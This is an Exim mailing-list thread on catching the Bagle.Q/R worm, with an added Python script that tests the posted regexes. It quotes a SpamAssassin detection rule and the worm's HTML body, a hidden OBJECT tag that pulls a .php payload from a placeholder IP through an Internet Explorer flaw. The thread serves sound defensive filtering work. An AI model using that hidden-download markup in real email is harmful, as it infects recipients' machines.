>From: Tim Jackson <lists@???>
>To: exim-users@???
>Subject: Re: [Exim] More windows viruses
>Date: Thu, 18 Mar 2004 17:50:02 +0000
>
>Hi Nigel, on Thu, 18 Mar 2004 17:35:59 +0000 you wrote:
>
>[Bagle Q/R]
>> I'd be interested if anyone has an exiscan ACL rule that kills this off
>> with a high degree of certainty since there's bound to be a pile of these
>> around soon.
>
>No, but I've had the following rule in my bogus-virus-warnings SpamAssassin
>ruleset since earlier today; I guess you could drop the regex into the
>DATA ACL equally well:
>
>rawbody VIRUS_WARNING_BAGLE3 /^<OBJECT STYLE="display:none"
>DATA="http:\/\/[0-9\.]+:81\/[0-9]+\.php">$/
>describe VIRUS_WARNING_BAGLE3 Looks like Bagle.R virus/bounce
>score VIRUS_WARNING_BAGLE3 10
A message that arrived on the UK security mailing list earlier today
included:
The virus itself is not sent as an attachment, but is instead
downloaded from the infecting machine exploiting a vulnerability
in Internet Explorer. The contents of the email are:
<html><body>
<font face="System">
<OBJECT STYLE="display:none" DATA="
http://a.b.c.d/123456.php">
</OBJECT></body></html>
So I guess a slight mod to Tim's regex should do the trick.
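To show why Tim's regex misses the body quoted above and what the "slight mod" needs to cover, here is an added example (not code from either post, and not an Exim or SpamAssassin rule as such): the original pattern and a relaxed one run in Python over constructed message bodies. It assumes a constructed IP address in place of "a.b.c.d", and it approximates SpamAssassin's rawbody line-anchored match with Python's MULTILINE mode; the relaxed pattern tolerates the line break after DATA=", an optional port and whitespace, and additionally requires the closing </OBJECT> so a stray <OBJECT> tag alone does not trigger it.

```python
import re

# Tim's original rule body, as posted: the whole OBJECT tag on one line, with :81.
# MULTILINE makes ^ and $ line-anchored, approximating a per-line rawbody match.
ORIGINAL_RE = re.compile(
    r'^<OBJECT STYLE="display:none" DATA="http://[0-9.]+:81/[0-9]+\.php">$',
    re.MULTILINE,
)

# Relaxed version (assumption, not a rule from the thread):
#  - \s* after DATA=" accepts the line break seen in the quoted sample
#  - a dotted-quad IP with an optional port instead of a fixed :81
#  - the closing </OBJECT> must follow, to reduce false positives
MODIFIED_RE = re.compile(
    r'<OBJECT\s+STYLE="display:none"\s+DATA="\s*'
    r'http://[0-9]{1,3}(?:\.[0-9]{1,3}){3}(?::[0-9]{1,5})?/[0-9]+\.php"\s*>'
    r'\s*</OBJECT>',
    re.IGNORECASE,
)

# Constructed sample in the shape quoted from the UK security list post;
# 10.1.2.3 stands in for the placeholder a.b.c.d.
BAGLE_BODY = (
    '<html><body>\n'
    '<font face="System">\n'
    '<OBJECT STYLE="display:none" DATA="\n'
    'http://10.1.2.3/123456.php">\n'
    '</OBJECT></body></html>\n'
)

# Constructed sample matching the one-line, port-81 form the original rule expects.
ONE_LINE_BODY = (
    '<html><body>\n'
    '<OBJECT STYLE="display:none" DATA="http://10.1.2.3:81/123456.php">\n'
    '</OBJECT></body></html>\n'
)

# Constructed benign HTML mail with an <object> tag, for a false-positive check.
BENIGN_BODY = (
    '<html><body>\n'
    '<p>Please see the attached report.</p>\n'
    '<object data="https://example.org/report.pdf" type="application/pdf">'
    '</object>\n'
    '</body></html>\n'
)


def matches(pattern, body):
    """True if the compiled pattern fires anywhere in the raw body."""
    return pattern.search(body) is not None


def scan(body):
    """Return the names of the rules that fire on a body, in a fixed order."""
    hits = []
    if matches(ORIGINAL_RE, body):
        hits.append("VIRUS_WARNING_BAGLE3")
    if matches(MODIFIED_RE, body):
        hits.append("VIRUS_WARNING_BAGLE3_RELAXED")
    return hits


if __name__ == "__main__":
    for name, body in (("bagle", BAGLE_BODY), ("one_line", ONE_LINE_BODY),
                       ("benign", BENIGN_BODY)):
        print(name, scan(body))
```

The original pattern fires only on the one-line form; the sample from the UK list breaks the URL onto a second line and carries no port, so only the relaxed pattern catches it, and neither fires on the benign body.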